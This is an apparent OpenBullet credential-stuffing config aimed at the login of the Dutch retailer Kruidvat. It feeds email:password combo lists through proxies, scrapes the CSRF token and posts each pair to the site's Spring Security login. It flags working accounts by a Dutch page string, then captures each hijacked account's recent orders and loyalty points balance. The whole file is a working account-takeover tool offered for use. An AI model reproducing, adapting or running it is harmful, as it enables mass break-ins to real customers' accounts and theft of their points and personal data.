[SETTINGS]
{
  "Name": "Kruidvat",
  "SuggestedBots": 15,
  "LastModified": "2018-05-12T21:30:29.8525703+00:00",
  "AdditionalInfo": "",
  "Author": "DADEX55",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_REQUEST REQUEST GET "https://www.kruidvat.nl/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.kruidvat.nl/login" 
  HEADER "Origin: https://www.kruidvat.nl" 
#CSRF_PARSE PARSE "<SOURCE>" CSS "[name=CSRF_TOKEN]" "value" 0 -> VAR "TOKEN" "" "" 
#POST_REQUEST REQUEST POST "https://www.kruidvat.nl/j_spring_security_check" AutoRedirect=TRUE 
  CONTENT "CSRF_TOKEN=<TOKEN>&j_username=<USER>&j_password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://www.kruidvat.nl" 
  HEADER "Referer: https://www.kruidvat.nl/login" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Vul een geldig e-mailadres en wachtwoord in" 
  KEYCHAIN Success OR 
    KEY "Recente bestellingen" 
#Capture_bestellingen PARSE "<SOURCE>" CSS "body > div.c-container.c-container--default > div > main > section > section.account-points-block.cf > article > ul > li > strong" "innerHTML" 0 -> CAP "Recente bestellingen" "" "" 
#GET_REQUEST_FOR_CAPTURE REQUEST GET "https://www.kruidvat.nl/kado" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.kruidvat.nl/kado" 
  HEADER "Origin: https://www.kruidvat.nl" 
#Jouw_Spaarpunten_CAPTURE PARSE "<SOURCE>" CSS "body > div.c-container.c-container--default > div.c-container__row > main > div > div:nth-child(1) > div > div > div.c-points__main" "innerHTML" 0 -> CAP "Jouw Spaarpunten" "" "" 
